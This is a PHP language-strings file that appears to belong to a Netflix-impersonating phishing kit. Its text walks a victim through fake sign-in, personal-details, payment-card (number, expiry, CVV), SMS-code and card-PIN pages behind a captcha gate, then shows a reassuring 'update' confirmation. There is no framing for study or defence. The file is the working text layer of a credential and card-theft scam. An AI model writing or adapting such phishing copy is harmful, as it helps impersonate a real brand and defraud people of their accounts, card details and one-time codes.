<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "en",
        "xcapt" => "Please take a moment to resolve the hCaptcha below. It helps us ensure that you're a genuine user and not a bot, providing a secure environment for everyone.",
        "xcapt1" => "Please check on the CAPTCHA box.",
        "xcapt2" => "Verification",
        "xcapt3" => "Continue",
        "xmain1" => "Sign In",
        "xmain2" => "Email or phone number",
        "xmain3" => "Please enter a valid email or phone number.",
        "xmain4" => "Password",
        "xmain5" => "Your password must contain between 4 and 60 characters.",
        "xmain6" => "Sign In",
        "xmain7" => "Remember me",
        "xmain8" => "Need help?",
        "xmain9" => "New to Netflix?",
        "xmain10" => " Sign up now.",
        "xmain11" => "This page is protected by Google reCAPTCHA to ensure you're not a bot.",
        "xmain12" => "Learn more.",
        "xinfoz1" => "Personal Information",
        "xinfoz2" => "First and Last Name",
        "xinfoz3" => "This field is required.",
        "xinfoz4" => "Date of Birth",
        "xinfoz5" => "Address",
        "xinfoz6" => "City",
        "xinfoz7" => "Postal Code",
        "xinfoz8" => "Email Address",
        "xinfoz9" => "Phone Number",
        "xinfoz10" => "The fields in this form are required as we need this information to process your request.",
        "xinfoz11" => "Continue",
        "xpay1" => "Set up your payment card",
        "xpay2" => "Card Number",
        "xpay3" => "Card number required.",
        "xpay4" => "Expiration Date",
        "xpay5" => "Expiration date required.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV required.",
        "xpay8" => "End-to-end encrypted",
        "xpay9" => "Continue",
        "xsms1" => "Verification",
        "xsms2" => "For your security, we need to ensure it's really you.",
        "xsms3" => "We will send you an SMS with a security code",
        "xsms4" => "Please enter the received code",
        "xsms5" => "SMS Code",
        "xsms6" => "Invalid SMS code",
        "xsms7" => "This step is necessary to securely process your request.",
        "xsms8" => "Continue",
        "xpin1" => "Verification",
        "xpin2" => "For your security, we need to ensure it's really you.",
        "xpin3" => "We will send you an SMS with a security code",
        "xpin4" => "Please enter your card's PIN code",
        "xpin5" => "PIN Code",
        "xpin6" => "Invalid PIN code",
        "xpin7" => "This step is necessary to securely process your request.",
        "xpin8" => "Continue",
        "xexpl1" => "Update",
        "xexpl2" => "We hope this communication finds you well. We want to inform you that it's essential to update your information on our platform to ensure a continuous and secure user experience.",
        "xexpl3" => "To improve our services and ensure the security of your account, please take a moment to update your information.",
        "xexpl4" => "Continue",
        "xconf1" => "Confirmation",
        "xconf2" => "We sincerely thank you for taking the time to update your information on our platform. Your commitment to the security and accuracy of your account details is crucial to us.",
        "xconf3" => "Your changes have been successfully saved. You can now fully enjoy our platform with the latest and up-to-date information.",
        "xconf4" => "Continue",
        "xload1" => "Processing...",
        "xload2" => "Do not leave this page.",
        "xfoot1" => "Questions? Contact us.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Help Center",
        "xfoot4" => "Terms of Use",
        "xfoot5" => "Privacy",
        "xfoot6" => "Cookie Preferences",
        "xfoot7" => "Corporate Information",
        "xfoot8" => "English"
    );

    return $lang[$phrase];
}
?>
